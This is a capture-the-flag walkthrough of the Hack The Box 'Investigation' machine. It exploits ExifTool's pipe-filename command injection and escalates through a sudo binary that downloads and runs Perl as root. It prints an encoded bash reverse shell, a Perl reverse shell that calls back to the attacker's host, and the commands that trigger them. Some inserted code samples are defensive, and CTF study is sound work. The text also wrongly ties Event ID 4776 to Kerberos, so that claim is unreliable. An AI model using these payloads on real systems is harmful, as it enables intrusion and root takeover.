https://app.hackthebox.com/machines/Investigation
Enumeration:
I started with a quick rustscan and observed only two open ports on the network: 22 and 80.
Here are the results of the port scan:
Port 22: OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Port 80: Apache httpd 2.4.41
In the port scan results I also found a domain, http://eforenzics.htb/, which I added to my /etc/hosts file. Browsing the website, I found an option to upload images and get forensics results for them.
I then ran a directory scan against the web server and found only one result: '/assets'.
I tried to access '/assets', but received a 403 error.
Next, I tried to upload a '.php' file in the hope of getting a shell, but the filter blocked any upload other than '.jpg' and '.png'. I tried many filter bypasses, but none of them worked.
After multiple failures, I uploaded a regular PNG image and it gave me the forensics results of the image.
I observed that the website was using ExifTool version 12.37 for the image forensics.
Searching for an exploit for this version, I landed on this page, which states: "An attacker can pass a filename that ends with a pipe ( | ) to exiftool and if it exists on the filesystem, execute it as an operating system command."
I tested this with Burp Suite. First, I started 'tcpdump' listening for 'ICMP' to check whether I received any response from the machine. I got a response from the host:
```bash
sudo tcpdump icmp -i tun0 -v
```
After confirming that the website was responding and that exiftool was vulnerable, it was time for the reverse shell.
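As an added example (not code from the write-up or from the target site), this is the server-side fix for the weakness just described: the client-chosen filename must never reach ExifTool, so the handler picks its own random on-disk name, checks magic bytes, and treats a name ending in "|" as something to log and reject. The function names and the `/var/uploads` directory are assumptions.

```python
import os
import re
import secrets

# Added example, not code from the write-up. A client-chosen filename ending
# in "|" reached ExifTool, which ran it as an OS command; here the client
# never chooses the on-disk name, so nothing it controls is passed to ExifTool.

# Magic bytes of the two formats the site accepts.
SIGNATURES = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def is_suspicious_name(client_name):
    """Detection hook: True if the upload name should be logged and rejected.
    A trailing '|' is the exact pattern the write-up used against ExifTool."""
    return client_name.endswith("|") or not SAFE_NAME.match(client_name)


def validate_upload(client_name, data):
    """Return the vetted extension or raise ValueError. The client name only
    supplies the extension; its bytes are never used as a path."""
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in SIGNATURES:
        raise ValueError("only .jpg and .png uploads are accepted")
    if not data.startswith(SIGNATURES[ext]):
        raise ValueError("file content does not match its extension")
    return ext


def stored_name(ext):
    """Random server-chosen name: 32 hex characters plus a vetted extension."""
    return secrets.token_hex(16) + ext


def exiftool_argv(upload_dir, name):
    """Build ExifTool's argv as a list (no shell). 'name' must come from
    stored_name(), so it cannot end in '|' or contain path separators."""
    if not SAFE_NAME.match(name):
        raise ValueError("refusing to pass an unvetted name to exiftool")
    return ["exiftool", "-json", os.path.join(upload_dir, name)]


def handle_upload(client_name, data, upload_dir="/var/uploads"):
    """Reject odd names, check content, pick a server-side name and return
    the ExifTool command (built, not executed, in this example)."""
    if is_suspicious_name(client_name):
        raise ValueError("rejected upload name: %r" % client_name)
    return exiftool_argv(upload_dir, stored_name(validate_upload(client_name, data)))
```

Upgrading ExifTool is still required; the random server-side name just removes the attacker's control over what ExifTool is asked to open.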
Initial access:
I tried injecting the regular bash reverse shell payload but didn't receive a shell; there may be some filters on the website. I then base64-encoded the payload and appended the decode step after it, which allowed the payload to execute as well.
```text
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41NS81MyAwPiYxCg==' | base64 -d | bash|
```
This time I received a reverse shell as the user 'www-data' and then stabilized the shell.
I found a user folder named ‘smorton’ in the home directory, but I did not have access to it.
I then checked for privilege escalation vectors, but some of the methods required a user password, which I did not have. I ran 'linpeas' to look for possible priv esc vectors and found a cron job running from '/usr/bin/crontab' that performs some activity in the folder '/usr/local/investigation/analysed_log'.
I then explored the '/usr/local/investigation/' path and discovered a .msg file called 'Windows Event Logs for Analysis.msg'. I transferred this file to my machine and checked its content online, as I don't have an email reader on my Kali machine.
I also downloaded the email attachment to my machine. After unzipping it I got another file, 'security.evtx', which is a Windows event log file.
I tried to read its content, but it is not in a human-readable format, so I used a script from this GitHub repo to dump the file in a human-readable format.
Checking the dump, I found some credentials in it. Because the dump is very large, I searched for event code '4776' to look for interesting strings.
Event ID 4776 is a security-related event that is logged when a computer attempts to authenticate a user account using Kerberos authentication. This event is triggered when an authentication attempt fails, and helps identify where the failure occurred.
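The filtering step above, as an added example that is not from the write-up: it pulls the 4776 records out of an XML dump of security.evtx and flags TargetUserName values that do not look like account names, which is how a typed-in secret ends up in this log. It assumes the dump uses the EVTX-to-XML layout (Event/System/EventID and Event/EventData/Data[@Name]); the sample records are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Added example, not from the write-up. Filters Event ID 4776 records from an
# XML dump of security.evtx and flags usernames that look like a secret typed
# into the username field. Dump layout assumed: EVTX-to-XML; records are
# constructed (a real dump has thousands of events).
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

SAMPLE_DUMP = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<EventID>4624</EventID></System><EventData><Data Name="TargetUserName">alice</Data>
</EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<EventID>4776</EventID></System><EventData><Data Name="TargetUserName">alice</Data>
<Data Name="Workstation">WS01</Data><Data Name="Status">0x0</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>
<EventID>4776</EventID></System><EventData><Data Name="TargetUserName">Sup3rS3cr3t!Pass</Data>
<Data Name="Workstation">WS01</Data><Data Name="Status">0xc0000064</Data></EventData></Event>
</Events>"""

# Plausible Windows account name characters; '$' covers machine accounts.
ACCOUNT_NAME = re.compile(r"^[A-Za-z0-9._$-]+$")


def events_4776(xml_text):
    """Return one dict of EventData fields per 4776 record in the dump."""
    out = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4776":
            continue
        out.append({d.get("Name"): (d.text or "")
                    for d in ev.findall("e:EventData/e:Data", NS)})
    return out


def looks_like_secret(name):
    """Heuristic: not a valid account name, or long mixed-case with digits."""
    if not ACCOUNT_NAME.match(name):
        return True
    return (len(name) >= 10 and any(c.isupper() for c in name)
            and any(c.islower() for c in name) and any(c.isdigit() for c in name))


def leaked_credential_candidates(xml_text):
    """Failed 4776 validations (Status != 0x0) whose username looks like a
    secret: the strings an analyst should treat as exposed and rotate."""
    return [(ev["Workstation"], ev["TargetUserName"], ev["Status"])
            for ev in events_4776(xml_text)
            if ev.get("Status", "0x0") != "0x0"
            and looks_like_secret(ev.get("TargetUserName", ""))]
```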
User flag:
I tried logging in over SSH with the credentials I had gathered, as the 'smorton' account, and it succeeded. (pwn3d!🙂)
Once logged in, I found the user flag in the ‘smorton’ home directory.
Priv Esc:
I started with manual enumeration and checked the ‘sudo’ permissions using the ‘sudo -l’ command, which returned the following:
Next, I ran the 'strings' command on the 'binary' file, but the output was not clear:
At this point I was stuck, so I ran LinPEAS to find other possible vectors, but found none. I searched for hints online and found this walkthrough.
In the blog, the author uploaded the binary to an online decompiler and reviewed the source code.
They extracted the main function of the binary, shown in the following code:
```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <curl/curl.h>

/* Decompiler output for /usr/bin/binary. data_2027 and data_202a are string
   constants the decompiler did not resolve (the fopen mode and a format
   string); the curl option numbers are the raw CURLOPT_* values. */
int32_t main(int32_t argc, char** argv, char** envp) {
    if (argc != 3) {                          /* exactly two arguments required */
        puts("Exiting... ");
        exit(0); /* no return */
    }
    if (getuid() != 0) {                      /* must already be running as root */
        puts("Exiting... ");
        exit(0); /* no return */
    }
    if (strcmp(argv[2], "lDnxUysaQn") != 0) { /* second argument must be this string */
        puts("Exiting... ");
        exit(0); /* no return */
    }
    puts("Running... ");
    FILE* rax_8 = fopen(argv[2], &data_2027);  /* local file named after argv[2] */
    int64_t rax_9 = curl_easy_init();
    int32_t var_40 = 0x2712;
    curl_easy_setopt(rax_9, 0x2712, argv[1], 0x2712); /* 0x2712 = CURLOPT_URL: argv[1] */
    int32_t var_3c = 0x2711;
    curl_easy_setopt(rax_9, 0x2711, rax_8, 0x2711);   /* 0x2711 = CURLOPT_WRITEDATA: that file */
    int32_t var_38 = 0x2d;
    curl_easy_setopt(rax_9, 0x2d, 1, 0x2d);           /* 0x2d = CURLOPT_FAILONERROR */
    if (curl_easy_perform(rax_9) != 0) {              /* download argv[1] into the file */
        puts("Exiting... ");
        exit(0); /* no return */
    }
    int64_t rax_25 = snprintf(nullptr, 0, &data_202a, argv[2]);
    char* rax_28 = malloc((rax_25 + 1));
    snprintf(rax_28, (rax_25 + 1), &data_202a, argv[2]);
    int64_t rax_37 = snprintf(nullptr, 0, "perl ./%s", rax_28);
    char* rax_40 = malloc((rax_37 + 1));
    snprintf(rax_40, (rax_37 + 1), "perl ./%s", rax_28); /* builds "perl ./<file>" */
    fclose(rax_8);
    curl_easy_cleanup(rax_9);
    setuid(0);
    system(rax_40);                    /* runs whatever the URL served, as root */
    system("rm -f ./lDnxUysaQn");      /* then removes the downloaded file */
    return 0;
}
```
First, it checks whether three parameters were passed (actually two, because the first parameter is the program name itself) and exits if not.
Second, it checks whether it is being called as root (achievable because we can run it as root via sudo without a password) and exits if not.
Third, it checks whether the third parameter equals the string lDnxUysaQn, and exits if not.
Fourth, it fetches with curl the file at the URL given by the second parameter, then reads and runs it with perl.
The machine can be seen sending the GET request to the specified URL:
![image](https://user-images.githubusercontent.com/87700008/221631208-5a9a09bf-9176-430e-b33e-0f9dda4d9412.png)
I then hosted a Perl-based reverse shell on my Kali machine:
```perl
use Socket;
$i = "[My_IP_here]";   # listener address (placeholder kept from the write-up)
$p = 53;               # listener port
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
if (connect(S, sockaddr_in($p, inet_aton($i)))) {
    open(STDIN, ">&S");
    open(STDOUT, ">&S");
    open(STDERR, ">&S");
    exec("/bin/bash -i");
};
```
I then executed the command and got the shell. (pwn3d!🙂)
```bash
sudo /usr/bin/binary 10.10.X.X/shell.pl lDnxUysaQn
```